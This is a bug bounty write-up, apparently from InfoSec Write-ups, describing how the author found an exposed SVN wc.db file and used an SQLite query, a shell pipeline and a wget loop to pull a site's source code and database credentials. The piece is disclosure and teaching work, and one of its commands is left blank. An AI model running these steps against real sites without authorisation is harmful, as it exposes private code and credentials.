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Exposing Database Creds via SVN: A $400 Discovery

Photo by Markus Spiske on Unsplash

In this write-up, I will share how I uncovered a source code disclosure vulnerability through an exposed SVN (Subversion) repository. This subtle yet impactful issue led to significant risks, including the exposure of database credentials.

How I Found the Vulnerability

Here are some simple ways to find this vulnerability:

Method 1: Using Nuclei Templates

nuclei -t nuclei-templates/http/exposures/files/svn-wc-db.yaml -l <subdomain_list>

Method 2: Wordlist Brute Force

Adding .svn/wc.db to the wordlist and using dirsearch/ffuf

Method 3: Custom Dot Git Extension [The Method I Used]

Using Dot Git extension, need to change the configuration as it does not come with .svn detection.

This approach involves tweaking the Dot Git extension to detect `.svn` directories since it doesn’t do this by default.

Exploiting the Vulnerability

After spotting the exposed SVN directory, I followed these steps to dig deeper and uncover the source code and the database credentials:

Step 1: Downloading the `wc.db` File

First, I checked if the `wc.db` file was publicly accessible. I used a simple command to download it:


This showed that the file was indeed exposed and could be downloaded by anyone.

Step 2: Extracting Source Code Paths

With the `wc.db` file in hand, I ran an SQLite query to pull out the paths to the source code files stored in the repository:

sqlite3 wc.db ‘select local_relpath, “.svn/pristine/” || substr(checksum,7,2) || “/” || substr(checksum,7) || “.svn-base” as alpha from NODES;’ | tee Snv_Database

This query listed all the paths of the source code files in the repository, making it easier to find and access them.

Step 3: Creating URLs for the Source Code Files

Next, I generated URLs that pointed directly to these source code files:

cat Snv_database.txt | cut -d”|” -f2 | sort -u | sed “s/^/https:\/\/\//” | tee Urls_generated.txt

This gave me a list of URLs that I could use to access and download the source code files.

Step 4: Downloading the Source Code and Credentials

Finally, using the URLs I generated, I could download the source code files:

wget — input-file=Urls_generated.txt -P Source_code

I found database credentials among these files, which could have been exploited to gain unauthorized access to the application’s database.

Impact of the Vulnerability

The exposure of source code and database credentials can lead to serious consequences. With the database credentials in hand, attackers could gain unauthorized access to sensitive data, potentially leading to significant security breaches. Additionally, the exposed source code could be stolen, allowing competitors or malicious actors to exploit the company’s intellectual property, which could result in a loss of competitive advantage.


This experience shows how important it is to secure version control systems like SVN. Even a minor oversight, like leaving a `wc.db` file exposed, can lead to significant risks. Through responsible disclosure, I was able to help the company fix the issue quickly and was rewarded with a $400 bounty.

Published in InfoSec Write-ups

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Great article 👏👏
